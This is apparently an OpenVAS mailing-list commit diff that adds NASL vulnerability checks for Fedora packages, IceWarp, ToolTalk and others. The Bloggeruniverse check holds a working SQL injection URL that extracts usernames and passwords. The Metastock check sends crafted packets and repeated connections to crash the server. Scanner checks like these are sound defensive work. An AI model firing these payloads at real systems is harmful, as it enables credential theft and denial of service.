+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863542);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-3627");
+  script_cve_id("CVE-2011-1024", "CVE-2011-1025", "CVE-2011-1081");
+  script_name("Fedora Update for openldap FEDORA-2011-3627");
+  desc = "
+
+  Vulnerability Insight:
+  OpenLDAP is an open source suite of LDAP (Lightweight Directory Access
+  Protocol) applications and development tools. LDAP is a set of
+  protocols for accessing directory services (usually phone book style
+  information, but other information is possible) over the Internet,
+  similar to the way DNS (Domain Name System) information is propagated
+  over the Internet. The openldap package contains configuration files,
+  libraries, and documentation for OpenLDAP.
+
+
+  Affected Software/OS:
+  openldap on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066251.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of openldap");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"openldap", rpm:"openldap~2.4.23~10.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for libsoup FEDORA-2011-9820
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863546);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_xref(name: "FEDORA", value: "2011-9820");
+  script_cve_id("CVE-2011-2524");
+  script_name("Fedora Update for libsoup FEDORA-2011-9820");
+  desc = "
+
+  Vulnerability Insight:
+  Libsoup is an HTTP library implementation in C. It was originally part
+  of a SOAP (Simple Object Access Protocol) implementation called Soup, but
+  the SOAP and non-SOAP parts have now been split into separate packages.
+  
+  libsoup uses the Glib main loop and is designed to work well with GTK
+  applications. This enables GNOME applications to access HTTP servers
+  on the network in a completely asynchronous fashion, very similar to
+  the Gtk+ programming model (a synchronous operation mode is also
+  supported for those who want it).
+
+
+  Affected Software/OS:
+  libsoup on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066219.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of libsoup");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"libsoup", rpm:"libsoup~2.32.2~2.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Modified: trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -7,6 +7,9 @@
 # Authors:
 # Chandan S <schandan at secpod.com>
 #
+# Updated By: Antu Sanadi <santu at secpod.com> on 2011-09-27
+#   Updated to detect the recent versions.
+#
 # Copyright:
 # Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
 #
@@ -27,16 +30,13 @@
 if(description)
 {
   script_id(800096);
-  script_version("$Revision: 1.0 $");
+  script_version("$Revision: 1.1$");
   script_tag(name:"risk_factor", value:"None");
   script_name("Merak Mail Server Web Mail Version Detection");
   desc = "
-
   Overview: This script will detect the version of Merak Mail Server Web Mail
-  on the remote host and sets the KB.
+  on the remote host and sets the KB.";
 
-  Risk factor: None";
-
   script_description(desc);
   script_summary("Set KB for the version of Merak Mail Server");
   script_category(ACT_GATHER_INFO);
@@ -47,54 +47,72 @@
 }
 
 
+include("cpe.inc");
 include("http_func.inc");
-include("cpe.inc");
 include("host_details.inc");
 
 ## Constant values
 SCRIPT_OID  = "1.3.6.1.4.1.25623.1.0.800096";
 SCRIPT_DESC = "Merak Mail Server Web Mail Version Detection";
 
-port = 32000;
-banner = get_http_banner(port);
+## Get the default port
+port = get_http_port(default:80);
+if(!port){
+  port = 32000;
+}
 
-if("IceWarp" >!< banner){
+## Check the port status
+if(!get_port_state(port)){
   exit(0);
 }
 
-smtpPort = get_kb_item("Services/smtp");
-if(!smtpPort){
-  smtpPort = 25;
+banner = get_http_banner(port);
+if("IceWarp" >!< banner){
+  exit(0);
 }
 
-imapPort = get_kb_item("Services/imap");
-if(!imapPort){
-  imapPort = 143;
-}
+version = eregmatch(pattern:"(Merak|IceWarp).?([0-9.]+)", string:banner);
+if(version[2] == NULL)
+{
+  smtpPort = get_kb_item("Services/smtp");
+  if(!smtpPort){
+    smtpPort = 25;
+  }
 
-popPort = get_kb_item("Services/pop3");
-if(!popPort){
-  popPort = 110;
+  imapPort = get_kb_item("Services/imap");
+  if(!imapPort){
+    imapPort = 143;
+  }
+
+  popPort = get_kb_item("Services/pop3");
+  if(!popPort){
+    popPort = 110;
+  }
+
+  foreach port (make_list(smtpPort, imapPort, popPort))
+  {
+    banner = get_kb_item(string("Banner/", port));
+    if(banner =~ "IceWarp|Merak")
+    {
+      version = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
+      if(version[2] != NULL){
+         ver = version[2];
+     }
+   }
+  }
 }
+else if(version[2] != NULL){
+ ver = version[2];
+}
 
-foreach port (make_list(smtpPort, imapPort, popPort))
+if(ver)
 {
-  banner = get_kb_item(string("Banner/", port));
-  if(banner =~ "IceWarp|Merak")
-  {
-    ver = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
-    if(ver[2] != NULL)
-    {
-      set_kb_item(name:"MerakMailServer/Ver", value:ver[2]);
-      security_note(data:"Merak Mail Server Web Mail version " + ver[2] +
+  set_kb_item(name:"MerakMailServer/Ver", value:ver);
+  security_note(data:"Merak Mail Server Web Mail version " + ver +
                          " was detected on the host");
-
-      ## build cpe and store it as host_detail
-      cpe = build_cpe(value:ver[2], exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
-      if(!isnull(cpe))
-         register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
-
-    }
-    exit(0);
+  ## build cpe and store it as host_detail
+  cpe = build_cpe(value:ver, exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
+  if(!isnull(cpe)){
+    register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
   }
 }

Added: trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_bloggeruniverse_sql_injection_vuln.nasl 17111 2011-09-26 11:29:14 sep $
+#
+# Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902632);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2009-5090");
+  script_bugtraq_id(33744);
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability");
+  desc = "
+  Overview: The host is running Bloggeruniverse and is prone to sql injection
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to input passed via the 'id' parameter to 'editcomments.php'
+  is not properly sanitised before being used in SQL queries.
+
+  Impact:
+  Successful exploitation will let attackers to manipulate SQL queries by
+  injecting arbitrary SQL code.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Bloggeruniverse version 2 Beta.
+
+  Fix: No solution or patch is available as on 27th September 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://sourceforge.net/projects/bloggeruniverse/
+
+  References:
+  http://www.exploit-db.com/exploits/8043/
+  http://xforce.iss.net/xforce/xfdb/48697 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_summary("Check if Bloggeruniverse is vulnerable to SQL Injection");
+  script_category(ACT_ATTACK);
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/bloggeruniverse", "/blog", "/bg", cgi_dirs()))
+{
+  ## Send and Receive the response
+  sndReq = http_get(item:string(dir, "/index.php"), port:port);
+  rcvRes = http_send_recv(port:port, data:sndReq);
+
+  if("Bloggeruniverse" >< rcvRes && "CopyRight &copy;" >< rcvRes)
+  {
+    ## Construct the Attack Request
+    url = dir + "/editcomments.php?id=-2%20union%20all%20select%201,2,3,4,5" +
+             ",6,concat(0x4f70656e564153,0x3a,username,0x3a,password,0x3a,0" +
+             "x4f70656e5641532d53),8%20from%20users";
+
+    if(http_vuln_check(port:port, url:url, pattern:">openVAS:(.+):(.+):openVAS"))
+    {
+      security_hole(port);
+      exit(0);
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 17461 2011-09-27 10:42:13Z sep $
+#
+# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902478);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-3579", "CVE-2011-3580");
+  script_bugtraq_id(49753);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability");
+  desc = "
+  Overview: The host is running IceWarp Mail Server and is prone to xml entity
+  injection and information disclosure vulnerability.
+
+  Vulnerability:
+  The flaws are caused due to,
+  - Certain input passed via SOAP messages to 'server/webmail.php' is not
+    properly verified before being used. This can be exploited to disclose the
+    contents of arbitrary files.
+  - An unspecified script, which calls the 'phpinfo()' function, is stored with
+    insecure permissions inside the web root. This can be exploited to gain
+    knowledge of sensitive information.
+
+  Impact:
+  Successful exploitation will let the attacker to gain access to potentially
+  sensitive information, and possibly cause denial-of-service conditions. other
+  attacks may also be possible.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IceWarp Mail Server 10.3.2 and prior.
+
+  Fix: Upgrade to IceWarp Mail Server 10.3.3 or later,
+  For updates refer, http://www.icewarp.com
+
+  References:
+  http://secunia.com/advisories/46135/
+  http://xforce.iss.net/xforce/xfdb/70026
+  http://xforce.iss.net/xforce/xfdb/70025
+  http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt ";
+
+  script_description(desc);
+  script_summary("Check for the version of IceWarp Mail Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("gb_merak_mail_server_detect.nasl");
+  script_require_keys("MerakMailServer/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from kb
+icewarp = get_kb_item("MerakMailServer/Ver");
+if(!icewarp){
+  exit(0);
+}
+
+## Check for IceWarp Mail Server version < 10.3.3
+if(version_is_less(version:icewarp, test_version:"10.3.3")){
+  security_warning(0);
+}

Modified: trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -64,13 +64,13 @@
   script_copyright("Copyright (C) 2011 SecPod");
   script_family("Denial of Service");
   script_dependencies("find_service.nes");
-  script_require_ports(2194);
+  script_require_ports(2189);
   exit(0);
 }
 
 
 ## Get Default Port
-port = 2194;
+port = 2189;
 if(!get_port_state(port)){
  exit(0);
 }
@@ -82,15 +82,34 @@
 }
 
 ## Construct Attack Request
-req =  crap(data: raw_string(0x80), length:1024);
+req = raw_string( 0xcd, 0xab, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                  0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
+                  0x00, 0x00, 0x00, 0x00, 0x52, 0x4f, 0x53, 0x43,
+                  0x4f );
 
 ## Sending Attack
 send(socket:soc, data:req);
+res = recv(socket:soc, length:200);
 close(soc);
 
-## Waiting
-sleep(3);
+## Confirm the application
+if("Metastock" >!< res){
+  exit(0);
+}
 
+## Send multiple reconnection request
+for(i = 0; i < 5; i++)
+{
+  soc1 = open_sock_tcp(port);
+  if(!soc1){
+    break;
+  }
+
+  send(socket:soc1, data:req);
+  close(soc1);
+  sleep(1);
+}
+
 ## Open the socket and Check server is dead or alive
 soc = open_sock_tcp(port);
 if(!soc)
@@ -98,5 +117,4 @@
   security_hole(port);
   exit(0);
 }
-
 close(soc);

Added: trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_tooltalk_rpc_database_server_mult_vuln.nasl 17217 2011-09-23 12:14:17 sep $
+#
+# CDE ToolTalk RPC Database Server Multiple Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902477);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2002-0677", "CVE-2002-0678");
+  script_bugtraq_id(5083, 5082);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("CDE ToolTalk RPC Database Server Multiple Vulnerabilities");
+  desc = "
+  Overview: This host is running the CDE ToolTalk Database Server and is
+  prone to the multiple vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - An error in the handling symbolic link. The server does not check to ensure
+    that it is not a symbolic link. If an attacker creates a symbolic link on
+    the filesystem with the path/filename of the logfile, transaction data will
+    be written to the destination file as root.
+  - There are no checks to restrict the range of the index value. Consequently,
+    malicious file descriptor values supplied by remote clients may cause
+    writes to occur far beyond the table in memory. The only value written is
+    a NULL word, limiting the consequences.
+
+  Impact:
+  Successful exploitation could allow attackers to remotely deleting arbitrary
+  files and creating arbitrary directory entries. Further, attackers might be
+  able to crash the ToolTalk RPC database server, denying service to legitimate
+  users.
+
+  Impact Level: System/Application
+
+  Affected Software :
+  CDE ToolTalk RPC database server
+
+  Fix: Apply the patch from below link,
+  http://www.kb.cert.org/vuls/id/975403
+
+  References:
+  http://www.kb.cert.org/vuls/id/975403
+  http://www.kb.cert.org/vuls/id/299816
+  http://www.kb.cert.org/vuls/id/AAMN-5B239R
+  http://www.cert.org/advisories/CA-2002-20.html ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 SecPod,");
+  script_summary("Checks the presence of CDE ToolTalk RPC Database Server");
+  script_category(ACT_GATHER_INFO);
+  script_family("RPC");
+  script_dependencies("secpod_rpc_portmap.nasl");
+  script_require_keys("rpc/portmap");
+  exit(0);
+}
+
+include("misc_func.inc");
+
+if(report_paranoia < 2){
+ exit(0);
+}
+
+RPC_PROG = 100083;
+
+## Get the rpc port, CDE ToolTalk Database Server
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+  security_hole(port);
+  exit(0);
+}
+
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
+if(port){
+  security_hole(port);
+}



More information about the Openvas-commits mailing list